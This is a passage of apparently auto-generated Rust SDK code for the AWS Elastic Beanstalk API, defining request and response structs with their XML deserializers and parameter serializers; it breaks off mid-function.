#[doc="<p>Request to download logs retrieved with <a>RequestEnvironmentInfo</a>.</p>"] #[derive(Default,Debug,Clone)] pub struct RetrieveEnvironmentInfoMessage { #[doc="<p>The ID of the data's environment.</p> <p>If no such environment is found, returns an <code>InvalidParameterValue</code> error.</p> <p>Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the data's environment.</p> <p> If no such environment is found, returns an <code>InvalidParameterValue</code> error. </p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The type of information to retrieve.</p>"] pub info_type: EnvironmentInfoType, } /// Serialize `RetrieveEnvironmentInfoMessage` contents to a `SignedRequest`. struct RetrieveEnvironmentInfoMessageSerializer; impl RetrieveEnvironmentInfoMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RetrieveEnvironmentInfoMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } params.put(&format!("{}{}", prefix, "InfoType"), &obj.info_type); } } #[doc="<p>Result message containing a description of the requested environment info.</p>"] #[derive(Default,Debug,Clone)] pub struct RetrieveEnvironmentInfoResultMessage { #[doc="<p> The <a>EnvironmentInfoDescription</a> of the environment. </p>"] pub environment_info: Option<EnvironmentInfoDescriptionList>, } struct RetrieveEnvironmentInfoResultMessageDeserializer; impl RetrieveEnvironmentInfoResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RetrieveEnvironmentInfoResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = RetrieveEnvironmentInfoResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "EnvironmentInfo" => { obj.environment_info = Some(try!(EnvironmentInfoDescriptionListDeserializer::deserialize("EnvironmentInfo", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type S3Bucket = String; struct S3BucketDeserializer; impl S3BucketDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<S3Bucket, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type S3Key = String; struct S3KeyDeserializer; impl S3KeyDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<S3Key, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>The bucket and key of an item stored in Amazon S3.</p>"] #[derive(Default,Debug,Clone)] pub struct S3Location { #[doc="<p>The Amazon S3 bucket where the data is located.</p>"] pub s3_bucket: Option<S3Bucket>, #[doc="<p>The Amazon S3 key where the data is located.</p>"] pub s3_key: Option<S3Key>, } struct S3LocationDeserializer; impl S3LocationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<S3Location, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = S3Location::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "S3Bucket" => { obj.s3_bucket = Some(try!(S3BucketDeserializer::deserialize("S3Bucket", stack))); } "S3Key" => { obj.s3_key = Some(try!(S3KeyDeserializer::deserialize("S3Key", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `S3Location` contents to a `SignedRequest`. struct S3LocationSerializer; impl S3LocationSerializer { fn serialize(params: &mut Params, name: &str, obj: &S3Location) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.s3_bucket { params.put(&format!("{}{}", prefix, "S3Bucket"), &field_value); } if let Some(ref field_value) = obj.s3_key { params.put(&format!("{}{}", prefix, "S3Key"), &field_value); } } } pub type SampleTimestamp = String; struct SampleTimestampDeserializer; impl SampleTimestampDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SampleTimestamp, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Detailed health information about an Amazon EC2 instance in your Elastic Beanstalk environment.</p>"] #[derive(Default,Debug,Clone)] pub struct SingleInstanceHealth { #[doc="<p>Request metrics from your application.</p>"] pub application_metrics: Option<ApplicationMetrics>, #[doc="<p>The availability zone in which the instance runs.</p>"] pub availability_zone: Option<String>, #[doc="<p>Represents the causes, which provide more information about the current health status.</p>"] pub causes: Option<Causes>, #[doc="<p>Represents the color indicator that gives you information about the health of the EC2 instance. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] pub color: Option<String>, #[doc="<p>Information about the most recent deployment to an instance.</p>"] pub deployment: Option<Deployment>, #[doc="<p>Returns the health status of the specified instance. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-status.html\">Health Colors and Statuses</a>.</p>"] pub health_status: Option<String>, #[doc="<p>The ID of the Amazon EC2 instance.</p>"] pub instance_id: Option<InstanceId>, #[doc="<p>The instance's type.</p>"] pub instance_type: Option<String>, #[doc="<p>The time at which the EC2 instance was launched.</p>"] pub launched_at: Option<LaunchedAt>, #[doc="<p>Operating system metrics from the instance.</p>"] pub system: Option<SystemStatus>, } struct SingleInstanceHealthDeserializer; impl SingleInstanceHealthDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SingleInstanceHealth, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SingleInstanceHealth::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationMetrics" => { obj.application_metrics = Some(try!(ApplicationMetricsDeserializer::deserialize("ApplicationMetrics", stack))); } "AvailabilityZone" => { obj.availability_zone = Some(try!(StringDeserializer::deserialize("AvailabilityZone", stack))); } "Causes" => { obj.causes = Some(try!(CausesDeserializer::deserialize("Causes", stack))); } "Color" => { obj.color = Some(try!(StringDeserializer::deserialize("Color", stack))); } "Deployment" => { obj.deployment = Some(try!(DeploymentDeserializer::deserialize("Deployment", stack))); } "HealthStatus" => { obj.health_status = Some(try!(StringDeserializer::deserialize("HealthStatus", stack))); } "InstanceId" => { obj.instance_id = Some(try!(InstanceIdDeserializer::deserialize("InstanceId", stack))); } "InstanceType" => { obj.instance_type = Some(try!(StringDeserializer::deserialize("InstanceType", stack))); } "LaunchedAt" => { obj.launched_at = Some(try!(LaunchedAtDeserializer::deserialize("LaunchedAt", stack))); } "System" => { obj.system = Some(try!(SystemStatusDeserializer::deserialize("System", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the solution stack.</p>"] #[derive(Default,Debug,Clone)] pub struct SolutionStackDescription { #[doc="<p>The permitted file types allowed for a solution stack.</p>"] pub permitted_file_types: Option<SolutionStackFileTypeList>, #[doc="<p>The name of the solution stack.</p>"] pub solution_stack_name: Option<SolutionStackName>, } struct SolutionStackDescriptionDeserializer; impl SolutionStackDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SolutionStackDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SolutionStackDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "PermittedFileTypes" => { obj.permitted_file_types = Some(try!(SolutionStackFileTypeListDeserializer::deserialize("PermittedFileTypes", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type SolutionStackFileTypeList = Vec<FileTypeExtension>; struct SolutionStackFileTypeListDeserializer; impl SolutionStackFileTypeListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SolutionStackFileTypeList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(FileTypeExtensionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type SolutionStackName = String; struct SolutionStackNameDeserializer; impl SolutionStackNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SolutionStackName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Location of the source code for an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct SourceBuildInformation { #[doc="<p>The location of the source code, as a formatted string, depending on the value of <code>SourceRepository</code> </p> <ul> <li> <p>For <code>CodeCommit</code>, the format is the repository name and commit ID, separated by a forward slash. For example, <code>my-git-repo/265cfa0cf6af46153527f55d6503ec030551f57a</code>.</p> </li> <li> <p>For <code>S3</code>, the format is the S3 bucket name and object key, separated by a forward slash. For example, <code>my-s3-bucket/Folders/my-source-file</code>.</p> </li> </ul>"] pub source_location: SourceLocation, #[doc="<p>Location where the repository is stored.</p> <ul> <li> <p> <code>CodeCommit</code> </p> </li> <li> <p> <code>S3</code> </p> </li> </ul>"] pub source_repository: SourceRepository, #[doc="<p>The type of repository.</p> <ul> <li> <p> <code>Git</code> </p> </li> <li> <p> <code>Zip</code> </p> </li> </ul>"] pub source_type: SourceType, } struct SourceBuildInformationDeserializer; impl SourceBuildInformationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceBuildInformation, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SourceBuildInformation::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "SourceLocation" => { obj.source_location = try!(SourceLocationDeserializer::deserialize("SourceLocation", stack)); } "SourceRepository" => { obj.source_repository = try!(SourceRepositoryDeserializer::deserialize("SourceRepository", stack)); } "SourceType" => { obj.source_type = try!(SourceTypeDeserializer::deserialize("SourceType", stack)); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `SourceBuildInformation` contents to a `SignedRequest`. struct SourceBuildInformationSerializer; impl SourceBuildInformationSerializer { fn serialize(params: &mut Params, name: &str, obj: &SourceBuildInformation) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "SourceLocation"), &obj.source_location); params.put(&format!("{}{}", prefix, "SourceRepository"), &obj.source_repository); params.put(&format!("{}{}", prefix, "SourceType"), &obj.source_type); } } #[doc="<p>A specification for an environment configuration</p>"] #[derive(Default,Debug,Clone)] pub struct SourceConfiguration { #[doc="<p>The name of the application associated with the configuration.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the configuration template.</p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `SourceConfiguration` contents to a `SignedRequest`. struct SourceConfigurationSerializer; impl SourceConfigurationSerializer { fn serialize(params: &mut Params, name: &str, obj: &SourceConfiguration) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } pub type SourceLocation = String; struct SourceLocationDeserializer; impl SourceLocationDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceLocation, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type SourceRepository = String; struct SourceRepositoryDeserializer; impl SourceRepositoryDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceRepository, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type SourceType = String; struct SourceTypeDeserializer; impl SourceTypeDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SourceType, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Represents the percentage of requests over the last 10 seconds that resulted in each type of status code response. For more information, see <a href=\"http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html\">Status Code Definitions</a>.</p>"] #[derive(Default,Debug,Clone)] pub struct StatusCodes { #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 2xx (200, 201, etc.) status code.</p>"] pub status_2xx: Option<NullableInteger>, #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 3xx (300, 301, etc.) status code.</p>"] pub status_3xx: Option<NullableInteger>, #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 4xx (400, 401, etc.) status code.</p>"] pub status_4xx: Option<NullableInteger>, #[doc="<p>The percentage of requests over the last 10 seconds that resulted in a 5xx (500, 501, etc.) status code.</p>"] pub status_5xx: Option<NullableInteger>, } struct StatusCodesDeserializer; impl StatusCodesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<StatusCodes, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = StatusCodes::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Status2xx" => { obj.status_2xx = Some(try!(NullableIntegerDeserializer::deserialize("Status2xx", stack))); } "Status3xx" => { obj.status_3xx = Some(try!(NullableIntegerDeserializer::deserialize("Status3xx", stack))); } "Status4xx" => { obj.status_4xx = Some(try!(NullableIntegerDeserializer::deserialize("Status4xx", stack))); } "Status5xx" => { obj.status_5xx = Some(try!(NullableIntegerDeserializer::deserialize("Status5xx", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } struct StringDeserializer; impl StringDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<String, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Swaps the CNAMEs of two environments.</p>"] #[derive(Default,Debug,Clone)] pub struct SwapEnvironmentCNAMEsMessage { #[doc="<p>The ID of the destination environment.</p> <p> Condition: You must specify at least the <code>DestinationEnvironmentID</code> or the <code>DestinationEnvironmentName</code>. You may also specify both. You must specify the <code>SourceEnvironmentId</code> with the <code>DestinationEnvironmentId</code>. </p>"] pub destination_environment_id: Option<EnvironmentId>, #[doc="<p>The name of the destination environment.</p> <p> Condition: You must specify at least the <code>DestinationEnvironmentID</code> or the <code>DestinationEnvironmentName</code>. You may also specify both. You must specify the <code>SourceEnvironmentName</code> with the <code>DestinationEnvironmentName</code>. </p>"] pub destination_environment_name: Option<EnvironmentName>, #[doc="<p>The ID of the source environment.</p> <p> Condition: You must specify at least the <code>SourceEnvironmentID</code> or the <code>SourceEnvironmentName</code>. You may also specify both. If you specify the <code>SourceEnvironmentId</code>, you must specify the <code>DestinationEnvironmentId</code>. </p>"] pub source_environment_id: Option<EnvironmentId>, #[doc="<p>The name of the source environment.</p> <p> Condition: You must specify at least the <code>SourceEnvironmentID</code> or the <code>SourceEnvironmentName</code>. You may also specify both. If you specify the <code>SourceEnvironmentName</code>, you must specify the <code>DestinationEnvironmentName</code>. </p>"] pub source_environment_name: Option<EnvironmentName>, } /// Serialize `SwapEnvironmentCNAMEsMessage` contents to a `SignedRequest`. struct SwapEnvironmentCNAMEsMessageSerializer; impl SwapEnvironmentCNAMEsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &SwapEnvironmentCNAMEsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.destination_environment_id { params.put(&format!("{}{}", prefix, "DestinationEnvironmentId"), &field_value); } if let Some(ref field_value) = obj.destination_environment_name { params.put(&format!("{}{}", prefix, "DestinationEnvironmentName"), &field_value); } if let Some(ref field_value) = obj.source_environment_id { params.put(&format!("{}{}", prefix, "SourceEnvironmentId"), &field_value); } if let Some(ref field_value) = obj.source_environment_name { params.put(&format!("{}{}", prefix, "SourceEnvironmentName"), &field_value); } } } #[doc="<p>CPU utilization and load average metrics for an Amazon EC2 instance.</p>"] #[derive(Default,Debug,Clone)] pub struct SystemStatus { #[doc="<p>CPU utilization metrics for the instance.</p>"] pub cpu_utilization: Option<CPUUtilization>, #[doc="<p>Load average in the last 1-minute and 5-minute periods. For more information, see <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/health-enhanced-metrics.html#health-enhanced-metrics-os\">Operating System Metrics</a>.</p>"] pub load_average: Option<LoadAverage>, } struct SystemStatusDeserializer; impl SystemStatusDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<SystemStatus, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = SystemStatus::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "CPUUtilization" => { obj.cpu_utilization = Some(try!(CPUUtilizationDeserializer::deserialize("CPUUtilization", stack))); } "LoadAverage" => { obj.load_average = Some(try!(LoadAverageDeserializer::deserialize("LoadAverage", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes a tag applied to a resource in an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct Tag { #[doc="<p>The key of the tag.</p>"] pub key: Option<TagKey>, #[doc="<p>The value of the tag.</p>"] pub value: Option<TagValue>, } /// Serialize `Tag` contents to a `SignedRequest`. struct TagSerializer; impl TagSerializer { fn serialize(params: &mut Params, name: &str, obj: &Tag) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.key { params.put(&format!("{}{}", prefix, "Key"), &field_value); } if let Some(ref field_value) = obj.value { params.put(&format!("{}{}", prefix, "Value"), &field_value); } } } pub type TagKey = String; pub type TagValue = String; pub type Tags = Vec<Tag>; /// Serialize `Tags` contents to a `SignedRequest`. struct TagsSerializer; impl TagsSerializer { fn serialize(params: &mut Params, name: &str, obj: &Tags) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); TagSerializer::serialize(params, &key, obj); } } } pub type TerminateEnvForce = bool; #[doc="<p>Request to terminate an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct TerminateEnvironmentMessage { #[doc="<p>The ID of the environment to terminate.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to terminate.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Terminates the target environment even if another environment in the same group is dependent on it.</p>"] pub force_terminate: Option<ForceTerminate>, #[doc="<p>Indicates whether the associated AWS resources should shut down when the environment is terminated:</p> <ul> <li> <p> <code>true</code>: The specified environment as well as the associated AWS resources, such as Auto Scaling group and LoadBalancer, are terminated.</p> </li> <li> <p> <code>false</code>: AWS Elastic Beanstalk resource management is removed from the environment, but the AWS resources continue to operate.</p> </li> </ul> <p> For more information, see the <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/ug/\"> AWS Elastic Beanstalk User Guide. </a> </p> <p> Default: <code>true</code> </p> <p> Valid Values: <code>true</code> | <code>false</code> </p>"] pub terminate_resources: Option<TerminateEnvironmentResources>, } /// Serialize `TerminateEnvironmentMessage` contents to a `SignedRequest`. struct TerminateEnvironmentMessageSerializer; impl TerminateEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &TerminateEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.force_terminate { params.put(&format!("{}{}", prefix, "ForceTerminate"), &field_value.to_string()); } if let Some(ref field_value) = obj.terminate_resources { params.put(&format!("{}{}", prefix, "TerminateResources"), &field_value.to_string()); } } } pub type TerminateEnvironmentResources = bool; pub type TimeFilterEnd = String; pub type TimeFilterStart = String; pub type Timestamp = String; struct TimestampDeserializer; impl TimestampDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Timestamp, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type Token = String; struct TokenDeserializer; impl TokenDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Token, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes a trigger.</p>"] #[derive(Default,Debug,Clone)] pub struct Trigger { #[doc="<p>The name of the trigger.</p>"] pub name: Option<ResourceId>, } struct TriggerDeserializer; impl TriggerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Trigger, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Trigger::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type TriggerList = Vec<Trigger>; struct TriggerListDeserializer; impl TriggerListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<TriggerList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(TriggerDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Request to update an application.</p>"] #[derive(Default,Debug,Clone)] pub struct UpdateApplicationMessage { #[doc="<p>The name of the application to update. If no such application is found, <code>UpdateApplication</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>A new description for the application.</p> <p>Default: If not specified, AWS Elastic Beanstalk does not update the description.</p>"] pub description: Option<Description>, } /// Serialize `UpdateApplicationMessage` contents to a `SignedRequest`. struct UpdateApplicationMessageSerializer; impl UpdateApplicationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateApplicationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } } } #[derive(Default,Debug,Clone)] pub struct UpdateApplicationResourceLifecycleMessage { #[doc="<p>The name of the application.</p>"] pub application_name: ApplicationName, #[doc="<p>The lifecycle configuration.</p>"] pub resource_lifecycle_config: ApplicationResourceLifecycleConfig, } /// Serialize `UpdateApplicationResourceLifecycleMessage` contents to a `SignedRequest`. struct UpdateApplicationResourceLifecycleMessageSerializer; impl UpdateApplicationResourceLifecycleMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateApplicationResourceLifecycleMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); ApplicationResourceLifecycleConfigSerializer::serialize( params, &format!("{}{}", prefix, "ResourceLifecycleConfig"), &obj.resource_lifecycle_config, ); } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct UpdateApplicationVersionMessage { #[doc="<p>The name of the application associated with this version.</p> <p> If no application is found with this name, <code>UpdateApplication</code> returns an <code>InvalidParameterValue</code> error.</p>"] pub application_name: ApplicationName, #[doc="<p>A new description for this version.</p>"] pub description: Option<Description>, #[doc="<p>The name of the version to update.</p> <p>If no application version is found with this label, <code>UpdateApplication</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub version_label: VersionLabel, } /// Serialize `UpdateApplicationVersionMessage` contents to a `SignedRequest`. struct UpdateApplicationVersionMessageSerializer; impl UpdateApplicationVersionMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateApplicationVersionMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } params.put(&format!("{}{}", prefix, "VersionLabel"), &obj.version_label); } } #[doc="<p>The result message containing the options for the specified solution stack.</p>"] #[derive(Default,Debug,Clone)] pub struct UpdateConfigurationTemplateMessage { #[doc="<p>The name of the application associated with the configuration template to update.</p> <p> If no application is found with this name, <code>UpdateConfigurationTemplate</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>A new description for the configuration.</p>"] pub description: Option<Description>, #[doc="<p>A list of configuration option settings to update with the new specified option value.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>A list of configuration options to remove from the configuration set.</p> <p> Constraint: You can remove only <code>UserDefined</code> configuration options. </p>"] pub options_to_remove: Option<OptionsSpecifierList>, #[doc="<p>The name of the configuration template to update.</p> <p> If no configuration template is found with this name, <code>UpdateConfigurationTemplate</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub template_name: ConfigurationTemplateName, } /// Serialize `UpdateConfigurationTemplateMessage` contents to a `SignedRequest`. struct UpdateConfigurationTemplateMessageSerializer; impl UpdateConfigurationTemplateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateConfigurationTemplateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } 